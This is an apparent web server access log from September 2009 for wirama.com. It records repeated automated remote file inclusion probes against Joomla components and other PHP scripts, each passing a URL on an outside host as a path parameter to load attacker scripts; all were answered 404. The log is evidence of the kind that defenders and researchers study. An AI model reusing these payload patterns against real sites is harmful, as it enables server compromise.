61.109.250.29 - - [01/Sep/2009:21:55:50 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:55:50 -0700] "GET /logs/access_090531.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:55:50 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:56:28 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:21:56:35 -0700] "GET /logs/access_090701.log/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:21:56:35 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:56:35 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:56:35 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:56:35 -0700] "GET /logs/access_090701.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:21:56:36 -0700] "GET /logs/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:56:40 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:56:40 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:56:40 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:56:50 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:56:50 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:56:50 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:57:21 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:58:35 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:58:35 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:58:35 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:58:50 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:59:03 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:59:09 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/id1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:21:59:25 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:59:25 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:21:59:25 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:00:01 -0700] "GET /skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:00:01 -0700] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:00:01 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
61.109.250.29 - - [01/Sep/2009:22:00:18 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:01:20 -0700] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.254.195.7 - - [01/Sep/2009:22:02:12 -0700] "GET /logs/access.log/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:22:02:12 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:22:02:13 -0700] "GET /logs/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
64.38.2.242 - - [01/Sep/2009:22:02:16 -0700] "GET /logs/access_090401.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.38.2.242 - - [01/Sep/2009:22:02:16 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.38.2.242 - - [01/Sep/2009:22:02:16 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.184.252.3 - - [01/Sep/2009:22:02:25 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.184.252.3 - - [01/Sep/2009:22:02:25 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
64.38.2.242 - - [01/Sep/2009:22:02:36 -0700] "GET /logs/access_090601.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.23.2.21 - - [01/Sep/2009:22:02:53 -0700] "GET /scanhttp://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
94.23.2.21 - - [01/Sep/2009:22:02:53 -0700] "GET /logs/scanhttp://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
94.23.2.21 - - [01/Sep/2009:22:02:53 -0700] "GET /logs/access.log/scanhttp://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
94.23.2.21 - - [01/Sep/2009:22:02:53 -0700] "GET /logs/scanhttp://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
94.23.2.21 - - [01/Sep/2009:22:02:53 -0700] "GET /logs/access.log/scanhttp://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
94.23.2.21 - - [01/Sep/2009:22:02:53 -0700] "GET /scanhttp://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
94.23.2.21 - - [01/Sep/2009:22:03:20 -0700] "GET /scanhttp://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
94.23.2.21 - - [01/Sep/2009:22:03:20 -0700] "GET /logs/scanhttp://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
65.18.168.84 - - [01/Sep/2009:22:03:22 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.18.168.84 - - [01/Sep/2009:22:03:22 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
65.18.168.84 - - [01/Sep/2009:22:03:22 -0700] "GET /logs/access_090401.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.23.2.21 - - [01/Sep/2009:22:03:23 -0700] "GET /scanhttp://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
94.23.2.21 - - [01/Sep/2009:22:03:23 -0700] "GET /logs/scanhttp://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "wirama.com"
208.80.195.34 - - [01/Sep/2009:22:03:51 -0700] "GET / HTTP/1.0" 200 900 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; SpamBlockerUtility 4.8.0; MSN 9.0;MSN 9.1; MSNbMSNI; MSNmen-us; MSNcOTH)" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:22:04:04 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
65.18.168.84 - - [01/Sep/2009:22:04:07 -0700] "GET /logs/access_090601.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:04:52 -0700] "GET /skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:04:52 -0700] "GET /logs/access_090801.log//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:04:52 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.184.252.3 - - [01/Sep/2009:22:06:34 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.184.252.3 - - [01/Sep/2009:22:06:34 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
58.184.252.3 - - [01/Sep/2009:22:06:39 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:06:39 -0700] "GET /logs/access_090601.log//skin/zero_vote/error.php?dir=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:10:14 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:10:14 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:10:14 -0700] "GET /logs/access_090401.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:10:14 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:10:14 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:10:14 -0700] "GET /logs/access_090401.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:10:47 -0700] "GET /logs/access_090601.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
222.236.47.182 - - [01/Sep/2009:22:10:59 -0700] "GET /logs/access_090601.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://dcomcrew.com/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:22:15:04 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:15:04 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:15:04 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:15:27 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:15:27 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:15:27 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:16:49 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:22:16:50 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:22:16:50 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.254.195.7 - - [01/Sep/2009:22:21:53 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:22:23:00 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:22:23:00 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:22:23:03 -0700] "GET /logs/access_090501.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:22:25:20 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:22:25:20 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:22:25:20 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:22:25:34 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:22:25:34 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:22:25:34 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:26:08 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:22:26:08 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:22:26:08 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:22:26:30 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:22:26:30 -0700] "GET /logs/access_090801.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:22:26:30 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
118.129.166.10 - - [01/Sep/2009:22:27:21 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
121.254.195.7 - - [01/Sep/2009:22:28:07 -0700] "GET /logs/access_090401.log/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:22:28:07 -0700] "GET /http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
121.254.195.7 - - [01/Sep/2009:22:28:08 -0700] "GET /logs/http://kpu.feelmuziq.com/comm/attach/idx? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:29:36 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:29:36 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:29:36 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:29:40 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:29:40 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:29:40 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:22:29:47 -0700] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:22:29:47 -0700] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
58.184.252.3 - - [01/Sep/2009:22:29:52 -0700] "GET /logs/access_090531.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:22:30:48 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
61.109.250.29 - - [01/Sep/2009:22:30:57 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:31:08 -0700] "GET /logs/access_090601.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Sep/2009:22:32:14 -0700] "GET /logs/access_090601.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Sep/2009:22:32:14 -0700] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
195.207.160.102 - - [01/Sep/2009:22:32:14 -0700] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://tiete.com.br/copyright.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "wirama.com"
94.23.2.21 - - [01/Sep/2009:22:34:12 -0700] "GET /include/write.php?dir=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
94.23.2.21 - - [01/Sep/2009:22:34:12 -0700] "GET /logs/access.log//include/write.php?dir=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
94.23.2.21 - - [01/Sep/2009:22:34:12 -0700] "GET /logs//include/write.php?dir=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
94.23.2.21 - - [01/Sep/2009:22:34:14 -0700] "GET /logs//include/write.php?dir=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
94.23.2.21 - - [01/Sep/2009:22:34:14 -0700] "GET /logs/access.log//include/write.php?dir=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
94.23.2.21 - - [01/Sep/2009:22:34:14 -0700] "GET /include/write.php?dir=http://kpu.feelmuziq.com/comm/attach/perkosa.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.wirama.com"
118.129.166.10 - - [01/Sep/2009:22:35:07 -0700] "GET /logs/access.log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://cyberirc.org/scan/zfxid1? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.wirama.com"
